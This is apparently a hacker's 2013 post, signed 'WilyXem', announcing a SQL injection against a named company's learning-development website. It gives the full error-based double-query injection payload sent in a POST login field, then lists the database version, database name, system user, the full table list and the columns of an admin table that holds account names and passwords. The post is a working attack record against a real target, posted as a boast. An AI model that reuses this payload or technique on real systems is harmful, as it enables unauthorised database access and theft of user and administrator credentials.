WilyXem - One day, You gonna find me, I know that

******************************************************************
(+) Target  : http://learning-development.htc.com
(+) Author  : WilyXem
(+) Twitter : https://twitter.com/WilyXem
(+) Date    : 25.01.2013
(+) Hour    : 88:88 AM
(+) Method  : MySQL Injection Double Query {POST}
******************************************************************


 [+] WebSite                             : http://learning-development.htc.com/index.php?op=UserAuthCandidate

 [+] MySQL Injection Double Query Syntax :
 
 {POST} CandidateID=' and(select 1 from(select count(*),concat((select(
concat(0x3d3d3e,0x27,cast(database() as char),0x27,0x7e))
 from information_schema.tables limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
 and '1'='1 &CID='&FName='&Name=' {POST}


 [+] DataBase Version	    :   5.0.45
 [+] Current DataBase 	    : 	uniprosi_htc
 [+] Others DB's            :   information_schema, test
 [+] System User            :   unipros_htc@localhost


      DataBase : uniprosi_htc
 +---------------------------------+
          +--------+   
          | Tables |
          +--------+                                                           
+-----------------------------------+
| aspect_company_choice             | 
| aspect_group                      |
| aspect_group_item                 |
| aspect_suit                       |
| aspect_test                       | 
| capp_admin                        | 
| capp_answer                       |
| capp_answer_20120313              |
| capp_behavior_normal              |
| capp_candidate_pscore             |
| capp_course                       |
| capp_custom_rpt                   |
| capp_department                   |
| capp_desc                         |
| capp_enterprise                   |
| capp_group                        |
| capp_group_pscore                 |
| capp_interview_job                |
| capp_interview_job_pos            |
| capp_interview_necessary          |
| capp_interview_necessary_jf       |
| capp_interview_necessary_jp       |
| capp_interview_presave            |
| capp_interview_question           |
| capp_licence                      |
| capp_member                       |
| capp_member20120313               |
| capp_member_20120605              |
| capp_member_bk20121222            |
| capp_member_seq                   |
| capp_member_temp                  |
| capp_member_uid_seq               |
| capp_newaccount_cid_seq           |
| capp_normal                       |
| capp_normal_compete               |
| capp_normal_ktest                 |
| capp_normal_list                  |
| capp_normal_list_default_20121222 |
| capp_pscore                       |
| capp_pscore_copy1                 |
| capp_public                       |
| capp_queastion                    |
| del_capp_member                   |
| langs_avail                       |
| langs_i18n                        |
| langs_i18n_bak                    |
| system_education                  |
| system_gender                     |
| system_jobfunction                |
| system_jobgrade                   |
| system_jobstatus                  |
| system_log                        |
| system_pref                       |
+-----------------------------------+

Columns from table ==> capp_admin:

+---------+--------+---------+-------+
| Account | Normal | Active | Passwd |
+---------+--------+--------+--------+

And more...

===============================
Thanks, WilyXem.
===============================